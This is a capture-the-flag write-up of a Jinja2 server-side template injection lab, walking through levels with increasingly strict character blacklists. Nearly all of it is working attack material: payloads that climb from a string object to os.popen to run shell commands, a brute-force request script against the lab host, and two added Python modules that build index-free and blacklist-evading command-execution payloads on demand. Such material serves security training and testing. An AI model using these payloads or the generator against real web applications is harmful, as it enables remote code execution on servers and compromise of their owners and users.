SSTI-lab

Level-1 no waf

{{2*2}}

Testing confirms the SSTI: the template evaluates the expression and returns 4.

{{''.__class__}}

This returns <class 'str'>, the class of the empty string.

{{''.__class__.__bases__[0]}}

This returns <class 'object'>, the common base of every Python class.

{{''.__class__.__bases__[0].__subclasses__}}

This returns the bound method object.__subclasses__ itself; calling it with () yields the list of every class currently loaded in the interpreter, which the script below walks by index.

import requests

url = "http://node1.anna.nssctf.cn:28430/level/1"

# Alternative payload shapes (the second one is the form used at Level-4):
# {{''.__class__.__bases__[0].__subclasses__()[1]}}
# {{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(i)}}

# Request one subclass of object per index and print the index whose repr is
# os._wrap_close (its __init__.__globals__ is the os module's namespace).
for i in range(500):
    payload = {"code": "{{''.__class__.__bases__[0].__subclasses__()[" + str(i) + "]}}"}
    res = requests.post(url=url, data=payload)
    if "os._wrap_close" in res.text:
        print(res.text)
        print(payload)

Testing shows that "os._wrap_close" sits at index 133 of the subclass list, so subclass 133 can be used. Its __init__ is a function defined in the os module, so __init__.__globals__ is the os module's namespace and exposes popen. The index depends on the target's Python version and on which modules are loaded, which is why it is brute-forced rather than assumed.

{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}
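The 133 above is only valid for the lab's interpreter. The following is an added example, not code from the write-up: it finds the os._wrap_close index in the local interpreter and builds a payload that selects the class by name instead of by index, so the same payload works on any Python version. The lab's server code is not shown, so rendering with a bare jinja2 Environment (the same unrestricted engine Flask's render_template_string uses) is an assumption about it; if jinja2 is not installed the render step is skipped.

```python
import os  # importing os is what defines os._wrap_close; it is always loaded in CPython

# Level-1 payload from the write-up; index 133 is specific to the lab's interpreter.
LEVEL1_PAYLOAD = (
    "{{''.__class__.__bases__[0].__subclasses__()[133]"
    ".__init__.__globals__['popen']('ls').read()}}"
)


def find_wrap_close_index():
    """Locate os._wrap_close in object.__subclasses__() of the running interpreter.

    Local equivalent of the brute-force loop in the write-up: the position
    depends on the Python version and on which modules were imported before
    the template ran, so it has to be discovered, not assumed.
    """
    for i, cls in enumerate(object.__subclasses__()):
        if cls is os._wrap_close:
            return i
    raise LookupError("os._wrap_close is not among object's subclasses")


def index_free_payload(cmd):
    """Build a payload that picks _wrap_close by class name instead of by index.

    Only {% for %} / {% if %} / {% print %} statements are used, so the payload
    also contains no '{{'. Quotes, dots, brackets and underscores remain, so the
    later levels' rewrites still apply. cmd is a caller-supplied value spliced
    into a string literal (assumption: it contains no single quote).
    """
    return (
        "{% for c in ''.__class__.__bases__[0].__subclasses__() %}"
        "{% if c.__name__ == '_wrap_close' %}"
        "{% print c.__init__.__globals__['popen']('" + cmd + "').read() %}"
        "{% endif %}{% endfor %}"
    )


def render_locally(payload):
    """Render the payload with a plain jinja2 Environment, i.e. with the same
    (absent) restrictions that render_template_string applies to user input.
    Returns None when jinja2 is not installed so the rest still runs offline.
    """
    try:
        from jinja2 import Environment
    except ImportError:
        return None
    return Environment().from_string(payload).render()


if __name__ == "__main__":
    idx = find_wrap_close_index()
    print("os._wrap_close index here:", idx, "(the lab's was 133)")
    out = render_locally(index_free_payload("echo ssti"))
    print("rendered:", repr(out) if out is not None else "jinja2 not installed")
```

Running it prints a different index on each Python release, which is the point: a payload that hard-codes 133 silently breaks elsewhere, while the name-based loop does not.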


Level-2 bl['{{']

{{2*2}}

{{ is filtered. Jinja2 statement blocks {% %} are not, and {% print %} evaluates and outputs an expression just like {{ }} does.

{%print(2*2)%}


{%print(''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read())%}


Level-4 bl['[', ']']

{{''.__class__.__bases__[0]}}

The WAF blocks this one: [ and ] are filtered, so every subscript in the chain has to be rewritten.

{{''.__class__.__bases__.__getitem__(0).__subclasses__()}}
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133)}}

Each subscript is replaced by an explicit __getitem__() call, which needs no brackets; index 133 again yields os._wrap_close, whose __init__.__globals__ holds popen.

{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133).__init__.__globals__.__getitem__('popen')('ls').read()}}


Level-5 bl["'", '"']

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}

Single and double quotes are filtered, so the two string literals move out of the template into the request: Jinja2 resolves request.cookies.arg1 as request.cookies['arg1'], so the request carries Cookie: arg1=popen; arg2=ls. The starting object becomes () because '' would need quotes.

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}

request.values merges the query string and form data, so the same names can be sent as GET parameters (?arg1=popen&arg2=ls) or as POST fields instead of cookies.

Level-6 bl[‘_’]

{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[133]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['popen']('ls').read()}}

Each underscore is replaced with its hex escape \x5f and attribute access is switched to [] subscripting with a string key. The filter sees no underscore, but Jinja2 decodes backslash escapes when it lexes the string literal, so the engine still looks up __class__ and the rest of the chain; names without underscores (popen, ls, read) stay as they were.

Level-7 bl[‘.’]

The dot is filtered, but [] subscripting still works: Jinja2's obj['name'] lookup falls back to attribute access when the object has no item of that name, so every .attr in the chain becomes ['attr'], including the final ['read']().

{{''['__class__']['__bases__'][0]['__subclasses__']()[133]['__init__']['__globals__']['popen']('ls')['read']()}}
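Every level from Level-2 to Level-7 is the same attribute chain with one syntactic element rewritten. The following is an added example, not code from the write-up: it states the chain once as abstract steps and renders it in the bypass dialect each blacklist calls for, reproducing the payloads used above, and it mimics the Jinja2 lexer's escape decoding to show why the \x5f trick works. The blacklists are reconstructed from the level names in the write-up; Level-3 is not covered there and is left out.

```python
# Blacklists reconstructed from the level names in the write-up (constructed data).
LEVELS = {
    "Level-1": [],
    "Level-2": ["{{"],
    "Level-4": ["[", "]"],
    "Level-5": ["'", '"'],
    "Level-6": ["_"],
    "Level-7": ["."],
}

# The chain every level exploits, as abstract steps:
#   ''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()
# ("attr", name) = dotted attribute, ("item", key) = subscript, ("call", args) = invocation.
# 133 is the lab's os._wrap_close position; it differs between Python versions.
CHAIN = [
    ("attr", "__class__"), ("attr", "__bases__"), ("item", 0),
    ("attr", "__subclasses__"), ("call", ()), ("item", 133),
    ("attr", "__init__"), ("attr", "__globals__"), ("item", "popen"),
    ("call", ("ls",)), ("attr", "read"), ("call", ()),
]


def build(chain, base="''", no_brackets=False, no_dot=False, no_underscore=False, no_quotes=False):
    """Render the chain in one bypass dialect.

    no_brackets    x[k]     -> x.__getitem__(k)               (Level-4)
    no_dot         x.attr   -> x['attr']                      (Level-7)
    no_underscore  x.__a__  -> x["\\x5f\\x5fa\\x5f\\x5f"]     (Level-6; Jinja2 decodes the escape)
    no_quotes      'popen'  -> request.values.argN, base ()   (Level-5; strings come from the request)
    """
    n = 0  # counter for request.values.arg1, arg2, ...

    def lit(v):
        nonlocal n
        if isinstance(v, int):
            return str(v)
        if no_quotes:
            n += 1
            return "request.values.arg%d" % n
        if no_underscore and "_" in v:
            return '"' + v.replace("_", "\\x5f") + '"'
        return "'" + v + "'"

    expr = base
    for kind, val in chain:
        if kind == "attr":
            if no_dot or (no_underscore and "_" in val):
                expr += "[" + lit(val) + "]"
            else:
                expr += "." + val
        elif kind == "item":
            expr += (".__getitem__(" + lit(val) + ")") if no_brackets else ("[" + lit(val) + "]")
        else:  # call
            expr += "(" + ",".join(lit(a) for a in val) + ")"
    return expr


def wrap(expr, no_double_brace=False):
    """Output tag around the expression; {%print(...)%} when {{ is blacklisted (Level-2)."""
    return ("{%print(" + expr + ")%}") if no_double_brace else ("{{" + expr + "}}")


def violations(payload, blacklist):
    """Blacklisted substrings that still appear in the payload (empty list = passes)."""
    return [t for t in blacklist if t in payload]


def payload_for(level):
    """Choose the dialect from the level's blacklist and return a payload that passes it."""
    bl = LEVELS[level]
    expr = build(
        CHAIN,
        base="()" if "'" in bl else "''",
        no_brackets="[" in bl,
        no_dot="." in bl,
        no_underscore="_" in bl,
        no_quotes="'" in bl,
    )
    return wrap(expr, no_double_brace="{{" in bl)


def jinja_string_literal_value(body):
    """What Jinja2's lexer makes of a string literal body: backslash escapes are
    decoded (same encode/decode pair the lexer uses), so the engine sees '__class__'
    even though the WAF saw no underscore in the request."""
    return body.encode("ascii", "backslashreplace").decode("unicode-escape")


if __name__ == "__main__":
    for level in LEVELS:
        p = payload_for(level)
        status = "blocked on %r" % violations(p, LEVELS[level]) if violations(p, LEVELS[level]) else "passes"
        print(level, status)
        print("   ", p)
    print(repr(jinja_string_literal_value("\\x5f\\x5fclass\\x5f\\x5f")))
```

The generated strings are byte-for-byte the payloads used at each level above, so the module doubles as a check that a new blacklist combination (for instance brackets and dots together) has no dialect here yet: violations() will report the leftover characters instead of silently emitting a payload that the WAF would reject.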

